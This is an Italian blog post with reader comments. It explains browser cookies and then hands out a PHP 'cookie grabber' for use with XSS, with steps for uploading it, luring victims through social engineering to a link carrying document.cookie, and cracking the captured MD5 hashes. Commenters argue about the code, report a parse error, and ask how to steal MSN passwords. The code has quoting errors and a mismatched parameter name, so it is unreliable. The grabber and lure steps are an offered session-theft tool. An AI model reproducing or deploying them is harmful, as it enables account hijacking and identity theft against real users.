Cosa è un Cookie?
Un cookie è un file di testo contenente dei parametri, che viene inviato dal server web in contemporanea alla pagina, e successivamente viene stoccato in una cartella del vostro browser.
I cookie racchiudono una serie di “caratteristiche” che permettono al browser di identificarli e di associarli al server web che li ha prodotti.
L’intenzione di chi ci invia un cookie è quella di aiutarci a navigare sul suo sito, memorizzare l’identità e le nostre preferenze, così da offrirci qualcosa di più indicato ai nostri gusti.
Un’altra funzione importantissima dei cookie è quella di consentirci di accedere ad aree riservate di un sito web.
Dopo aver inserito in un form, username e password, il server ci invia un cookie che ci da i permessi ad accedere alle pagine riservate, quindi se proviamo a settare il nostro browser in modo tale da rifiutare i cookie, non potremo autenticarci su nessun sito.
Adesso veniamo al lato negativo dei cookie, uno è quello dello spam, navigando nel web molte aziende piazzano i loro banner, quando il browser si collega al loro server web per downloadare il banner, le aziende possono inviarci un cookie e raccogliere dati su di noi, per inviarci pubblicità indesiderata.
I cookie rimangono sull’hard disk per molto tempo, un soggetto che abbia accesso al nostro Pc o venga in possesso dei nostri cookie con un cookie grabber, oltre a scoprire i nostri gusti e altre informazioni personali, può utilizzarli per loggarsi su certi siti rubandoci la nostra identità.
Con poche righe di codice scritte in php, avrete un fantastico cookie grabber da utilizzare con una XSS.
Vi basta copiare il codice in un qualsiasi editor di testo e salvare con estensione .php, dopo ciò uppatelo sul vostro spazio web, con un po di social engineering indirizzate la vittima al link della pagina con in più questa stringa ?data=doocument.cookie.
Se utilizzato con una XSS, nei cookie troverete le password dei siti criptate in hash md5, dopo di che non vi resta che darle in pasto al tool.
Buon divertimento!
Codice del cookie grabber:
<?php $cookie = $_GET['c']; $ip = getenv (’REMOTE_ADDR’); $date=date(”j F, Y, g:i a”); $referer=getenv (’HTTP_REFERER’); $fp = fopen(’file.txt’, ‘a’); fwrite($fp, ‘Cookie: ‘.$cookie.’<br> IP: ‘ .$ip. ‘<br> Date and Time: ‘ .$date. ‘<br> Referer: ‘.$referer.’<br><br><br>’); fclose($fp); ?>
Salve.. vorrei sapere se il codice è giusto, perchè su un altro sito ho trovato questo: $data = $_GET[’data’];
al posto di quello vostro: $_GET[’data’] = $data
Inoltre, cos’è una XSS??? Come la creo??
e come risalgo a user e password tramite i miei cookie?
L’attacco XSS appartiene alla tipologia injection, quindi si tratta di immissione di codice arbitrario in input alle pagine web.
L’attacco può essere portato a compimento su qualsiasi sito che presenti l’utilizzo di tecnologie come JavaScript, VBScript, ActiveX, HTML e Flash.
quello giusto è questo:
$data = $_GET[’data’];
$data = $_GET[’data’];
$_GET[’data’] = $data
Scusami karlo ma secondo il tuo pnto di vista penso di grande programmatore PHP per asserire una frase come quella che hai detto..quale sarebbe la differenza tra le due dichiarazioni di variabili??(sempre se tu sappia di cosa intendo con dichiarazione di variabili…)sai quale è la risposta nessuna..sono esattamente la stessa cosa…madonna che gente..e il bello è che lo dice come un megaconsiglio STUDIA VA CHE é MEGLIO…scusa underground0 ma io ste cose proprip nn le sopporto..scusa il flame!
io dovrei rubare una password di msn tramite i cookie.. come faccio? GRAZIE CIAO A TUTTI
Scusate, ma come sarebbe “sono la stessa cosa” ? Oo?
nel lvalue viene copiato il valore del rvalue, quindi l’ordine e’ importante. Oo.
scusae ma non ho capito lo stesso come trovare o fare na xss c’è una guida?
Bello!
ma è possibile che in tutti i post che ci sono msn è sempre in causa?! MHA… che gente 
Non funzia Parse error: syntax error, unexpected T_STRING in /membri/session/altro/cookie_grabber_prova.php on line 2
r080cy90r, scusa ma hai torto. karlo ha perfettamente ragione, il codice giusto è:
$data = $_GET['data'];
Non è assolutamente possibile copiare il valore di una variabile mettendo la variabile ‘destinataria’ al secondo posto, poichè essendo vuota assegnerebbe alla variabile $_GET['data'] un valore nullo. In poche parole ti ritroveresti con due variabili vuote. Un po’ inutile, eh?
Salve,
per caso ho letto questa discussione e vorrei capire alcuni punti,
allora dopo aver creato il cookie grabber e averlo pubblicato sul mio spazio, invio il link alla vittima che da come ho capito dovrebbe contenere http://sitomio.altervista.org/cookiegrabber.php?data=doocument.cookie, usando XSS dovrei inserire il link del cookie nella pagina da inviare alla vittima?non ho ben capito
se potreste rispondermi all’indirizzo email oppur qui. tnx
devil
Minkia sapete che mi ero completamente dimenticato di questo post?? me loha fatto notare un ragazzo oggi via msn… eh si rega ho detto una cazzata cosmica e mi scuso con karlo…minkia aveva pienamente ragione…ma all’epoca ero un emerito cazzone..perdonate questa tremenda gaffe..ammetto le mie colpe e mi cospargo il capo di cenere..all’epoca la programmazione non era proprio il mio pane quotidiano..!
Mi scuso anche io, ho pubblicato un errore, pardon è un post d’inizio!
E di php non è che me ne intedevo tanto! Se non commentavate non mi sarei accorto e non avrei mai corretto! 
Thank’s
ma serve per forza una xss per prendere i cookie? non basta far andare una personasulla pagina dove si trova il codice?
Se non ho capito male devo inserire quel codice nel HTML di una pagina del mio sito web; una volta che la vittima è entrata cosa devo fare?
e qual’è il tool di cui parli??